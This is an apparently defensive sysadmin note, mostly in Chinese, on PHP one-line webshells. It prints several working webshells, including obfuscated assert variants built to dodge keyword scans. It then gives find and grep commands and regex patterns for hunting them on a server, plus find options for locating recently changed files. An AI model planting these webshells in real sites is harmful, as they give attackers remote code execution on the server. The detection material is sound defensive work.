<?php eval($_POST[g]);?>
<?php
$aa = str_replace(x,"","axsxxsxexrxxt");
$aa($_POST["test"]);
?>
例如:
<?php
function fo(){
//do something
echo "123";
return true;
}
$funname = 'fo';
//$funname = $_GET["func"];
assert("$funname()");
?>
<?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST[cc]); ?>
ref:
PHP一句话收集 (GitHub)
各種WebShell收集(GitHub)
簡單的檢測 php 一句話木馬的方式 (一些變形的木馬 這招不行)
How to Detect WebShell on PHP Web Server
例如:
find . -type f -name '*.php' | xargs grep -l "eval *(" --color
find . -type f -name '*.php' | xargs grep -l "gzuncompress(base64_decode(" --color
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color
php一句话木马检测绕过研究
另外
搜尋 所有 *.php 檔案:
find . -iname '*.php' -type f或是
find . -iname '*.php.*' -type f
find 幾個常用參數
-mtime n
檔案 "最後修改時間"(modification time),單位:天
-mmin n
檔案 "最後修改時間",單位:分鐘
-atime n
檔案 "最後存取時間" (access time),單位:天
檔案被讀取過或修改過 都算
-amin n
檔案 "最後存取時間",單位:分鐘
-ctime n
檔案 "最後修改時間"(status time),單位:天
-cmin n
檔案 "最後修改時間",單位:分鐘
例如
搜尋 10 分鐘內有讀取或變動的檔案
說明:檔案被讀取過 (但無更動) 也會列出來
find . -type f -amin -10
若是以 "天" 來搜尋,就是:
搜尋 3 天內有變動的檔案
find . -type f -mtime -3
另外,搜尋某段期間新增 (或變動) 的檔案:
**加上 -ls 會列出檔案時間
find -newermt "2020-10-08 10:00:00" ! -newermt "2020-10-08 22:00:00" -ls
